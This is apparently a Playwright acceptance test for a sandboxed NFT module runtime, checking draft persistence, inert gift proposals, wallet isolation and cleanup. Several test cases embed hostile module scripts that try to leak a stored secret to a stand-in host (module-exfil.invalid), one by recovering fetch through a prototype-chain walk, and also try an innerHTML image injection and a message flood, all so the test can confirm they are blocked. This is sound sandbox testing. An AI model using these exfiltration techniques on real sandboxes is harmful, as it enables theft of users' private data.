/** CI/browser acceptance, intentionally separate from node:test. Never uses a real wallet. */
import fs from 'node:fs';
import path from 'node:path';
import { createHash } from 'node:crypto';
import assert from 'node:assert/strict';
import { createStaticServer } from '../../scripts/lib/static-server.mjs';
const root=path.resolve(import.meta.dirname,'../..'),sha=bytes=>createHash('sha256').update(bytes).digest('hex');
const output=path.join(root,'reports/production/modules-browser');fs.mkdirSync(output,{recursive:true});
const run=fs.mkdtempSync(path.join(output,new Date().toISOString().replaceAll(':','-')+'-'));
const report={schema:'anima.modules-browser/1',startedAt:new Date().toISOString(),status:'running',scope:'Real Chromium, fixture wallet never connects or signs; viewport emulation is not physical-device coverage.',cases:[],limitations:['No actual wallet or public RPC.','Worker DOM compatibility is a bounded subset, not full browser DOM.','Memory/process limits are browser best effort.']};
const save=()=>fs.writeFileSync(path.join(run,'results.json'),JSON.stringify(report,null,2)+'\n');save();
let browser,server;
const fixtureSource=`
import {ModuleHostSession} from './web/modules/host.mjs';
import {mountHTML} from './web/modules/runtime.mjs';
const hash='0x'+'ab'.repeat(32),other='0x'+'cd'.repeat(32),address='0x'+'12'.repeat(20),identity={chainId:'31337',collection:address,tokenId:'1',account:address,registry:address,owner:address,epoch:'1'};
const values=new Map();let current={...identity},runtime,session,proposals=[];
const storage={getItem:key=>values.get(key)??null,setItem:(key,value)=>values.set(key,value)};
window.startModuleFixture=(html)=>{runtime?.destroy();proposals=[];session=new ModuleHostSession({identity,releaseId:hash,moduleKey:hash,manifest:{stateSchema:hash,capabilities:['identity.read','state.read','state.write','transaction.propose']},dependencies:[{releaseId:other,files:[{path:'large.bin',mime:'application/octet-stream',bytes:new Uint8Array(65536).fill(7)}]}],storage,verifyContext:async()=>current,onProposal:async proposal=>{proposals.push(proposal);return{queued:true,sent:false}}});session.state.set('secret','private-fixture-value');runtime=mountHTML({container:document.querySelector('#fixture'),recovered:{entrypoint:'index.html',manifest:{name:'worker-fixture'},files:[{path:'index.html',mime:'text/html',bytes:new TextEncoder().encode(html)}]},session,window,maxRuntimeMs:60000});};
window.fixtureStatus=()=>({closed:session?.closed,proposals,state:session?.state.read(),frames:document.querySelectorAll('iframe').length});
window.changeCustody=()=>{current={...identity,epoch:'2'};};
`;
function verifyCandidate(){const directory=path.join(root,'onchain-app/module-workbench'),manifest=JSON.parse(fs.readFileSync(path.join(directory,'manifest.json'))),html=fs.readFileSync(path.join(directory,'index.html'));assert.equal("0x"+sha(html),manifest.sha256,'Workbench build bytes changed');for(const[name,hash]of Object.entries(manifest.inputs)){assert.equal("0x"+sha(fs.readFileSync(path.join(root,name))),hash,'Workbench input changed: '+name);}return{directory,manifestSha256:sha(fs.readFileSync(path.join(directory,'manifest.json'))),htmlSha256:sha(html)};}
try{
 report.phase='preflight';const candidate=verifyCandidate();report.candidate=candidate;save();
 const {chromium}=await import('playwright'),{build}=await import('esbuild');
 const served=path.join(run,'served');fs.mkdirSync(served);fs.copyFileSync(path.join(candidate.directory,'index.html'),path.join(served,'index.html'));
 const bundled=await build({stdin:{contents:fixtureSource,resolveDir:root,sourcefile:'modules-browser-fixture.mjs'},bundle:true,format:'iife',platform:'browser',target:'es2022',write:false});
 fs.writeFileSync(path.join(served,'fixture.html'),'<!doctype html><html><body><main id="fixture"></main><script>'+bundled.outputFiles[0].text.replace(/<\/script/gi,'<\\/script')+'</script></body></html>');
 server=createStaticServer({directory:served});await new Promise((resolve,reject)=>{server.once('error',reject);server.listen(0,'127.0.0.1',resolve);});const origin='http://127.0.0.1:'+server.address().port;
 browser=await chromium.launch();report.browser=browser.version();report.phase='cases';save();
 async function check(name,viewport,fn){let context;const record={name,status:'running'};report.cases.push(record);save();try{context=await browser.newContext({viewport});const page=await context.newPage(),errors=[],external=[];page.on('pageerror',error=>errors.push(error.message));await context.route('**/*',route=>{const url=route.request().url();if(new URL(url).origin===origin||url.startsWith('data:')||url.startsWith('blob:'))return route.continue();external.push(url);return route.abort('blockedbyclient');});await fn(page,{errors,external});assert.deepEqual(external,[],'The runtime attempted an external network request');record.status='passed';await page.screenshot({path:path.join(run,name+'.png'),fullPage:true});}catch(error){record.status='failed';record.error=error.stack??String(error);}finally{await context?.close().catch(error=>{record.status='failed';record.cleanupError=String(error);});save();}}
 await check('desktop-workbench-draft-and-inert-gift',{width:1440,height:1000},async(page,{errors})=>{
  await page.addInitScript(()=>{window.walletCalls=[];window.ethereum={request:async p=>{window.walletCalls.push(p.method);throw Error('No real wallet in acceptance fixtures');}};});await page.goto(origin);await page.getByRole('heading',{name:'The same NFT. The same account.'}).waitFor();
  await page.locator('[data-example="aurora-notebook"]').click();const frame=page.frameLocator('[data-node="runtime-container"] iframe');await frame.getByLabel('A thought to keep').fill('A persistent browser draft');await frame.getByRole('button',{name:'Save draft',exact:true}).click();await frame.getByRole('status').filter({hasText:'browser-draft'}).waitFor();await page.locator('[data-action="close-runtime"]').click();await page.locator('[data-example="aurora-notebook"]').click();const reopened=page.frameLocator('[data-node="runtime-container"] iframe');await reopened.getByRole('button',{name:'Restore draft'}).click();await reopened.getByRole('status').filter({hasText:'A persistent browser draft'}).waitFor();assert.equal(await reopened.getByLabel('A thought to keep').inputValue(),'A persistent browser draft');
  await page.locator('[data-action="close-runtime"]').click();await page.locator('[data-example="gift-of-light"]').click();const gift=page.frameLocator('[data-node="runtime-container"] iframe');await gift.getByLabel('Recipient address').fill('0x'+'11'.repeat(20));await gift.getByLabel('Native gift · wei').fill('123');await gift.getByRole('button',{name:'Propose exact gift'}).click();await page.getByRole('heading',{name:'Local sample · request preview'}).waitFor();assert.equal(await page.locator('[data-node="confirm-review"]').isDisabled(),true);assert.deepEqual(await page.evaluate(()=>window.walletCalls),[]);assert.deepEqual(errors,[]);
 });
 await check('phone-workbench',{width:390,height:844},async(page,{errors})=>{await page.goto(origin);await page.locator('[data-example="resonant-garden"]').click();await page.frameLocator('iframe').getByRole('button',{name:'Listen · 8 seconds'}).waitFor();assert.equal(await page.evaluate(()=>document.documentElement.scrollWidth<=innerWidth+1),true);assert.deepEqual(errors,[]);});
 await check('html-worker-state-proposal-and-large-dependency',{width:1000,height:850},async(page,{errors})=>{
  await page.goto(origin+'/fixture.html');await page.evaluate(()=>window.startModuleFixture('<p id="result">ready</p><button id="save">Save</button><script>document.getElementById("save").addEventListener("click",async()=>{await anima.setState("draft",{count:1});const part=await anima.readPackage("0x"+"cd".repeat(32),"large.bin");await anima.propose({to:"0x"+"11".repeat(20),value:"9",data:"0x",description:"Review gift"});document.getElementById("result").textContent=String(part.bytes);});<\/script>'));const frame=page.frameLocator('iframe');await frame.getByRole('status').filter({hasText:'HTML worker ready'}).waitFor();await frame.getByRole('button',{name:'Save'}).click();await frame.locator('#result').filter({hasText:'65536'}).waitFor();const status=await page.evaluate(()=>window.fixtureStatus());assert.equal(status.proposals.length,1);assert.equal(status.proposals[0].value,'9');assert.deepEqual(status.state.draft,{count:1});assert.equal(status.closed,false);assert.deepEqual(errors,[]);
 });
 await check('html-worker-navigation-network-and-wallet-boundary',{width:1000,height:850},async(page)=>{
  await page.goto(origin+'/fixture.html');await page.evaluate(()=>window.startModuleFixture('<p id="result">ready</p><script>"use strict";const secret=await anima.getState("secret");let blocked=0;try{location.href="https://module-exfil.invalid/?secret="+secret}catch{blocked++}let p=Object.getPrototypeOf(globalThis),fetcher;while(p){if(typeof Object.getOwnPropertyDescriptor(p,"fetch")?.value==="function"){fetcher=p.fetch;break}p=Object.getPrototypeOf(p)}try{if(fetcher)await fetcher.call(globalThis,"https://module-exfil.invalid/?secret="+secret);else await fetch("https://module-exfil.invalid/")}catch{blocked++}document.getElementById("result").textContent=String(blocked)+":"+[typeof ethereum,typeof Worker,typeof window.open].join(",");<\/script>'));await page.frameLocator('iframe').locator('#result').filter({hasText:'2:undefined,undefined,undefined'}).waitFor();assert.equal((await page.evaluate(()=>window.fixtureStatus())).frames,1);await page.evaluate(()=>window.changeCustody());await page.waitForFunction(()=>window.fixtureStatus().closed);assert.equal((await page.evaluate(()=>window.fixtureStatus())).frames,0);
 });
 await check('html-worker-illegal-dom-and-message-flood-cleanup',{width:1000,height:850},async(page)=>{
  await page.goto(origin+'/fixture.html');await page.evaluate(()=>window.startModuleFixture('<p id="result">safe</p><script>postMessage({type:"dom",id:"result",property:"innerHTML",value:"<img src=https://module-exfil.invalid>"});<\/script>'));await page.waitForFunction(()=>window.fixtureStatus().closed);assert.equal((await page.evaluate(()=>window.fixtureStatus())).frames,0);
  await page.reload();await page.evaluate(()=>window.startModuleFixture('<p id="result">safe</p><script>for(let n=0;n<5000;n++)postMessage({type:"focus",id:"result"});<\/script>'));await page.waitForFunction(()=>window.fixtureStatus().closed);assert.equal((await page.evaluate(()=>window.fixtureStatus())).frames,0);
 });
 report.phase='candidate-recheck';assert.equal(verifyCandidate().manifestSha256,report.candidate.manifestSha256);report.status=report.cases.length===5&&report.cases.every(test=>test.status==='passed')?'passed':'failed';
}catch(error){report.status='failed';report.error=error.stack??String(error);}finally{
 for(const[label,cleanup]of[['browser',()=>browser?.close()],['server',()=>new Promise(resolve=>{if(!server)return resolve();server.closeAllConnections?.();server.close(resolve);})]]){try{await Promise.race([Promise.resolve().then(cleanup),new Promise((_,reject)=>{const timer=setTimeout(()=>reject(Error(label+' cleanup timed out')),7000);timer.unref?.();})]);}catch(error){report.status='failed';(report.cleanupErrors??=[]).push(String(error));}}
 report.finishedAt=new Date().toISOString();save();console.log('Module browser evidence:',path.join(run,'results.json'));if(report.status!=='passed')process.exitCode=1;
}
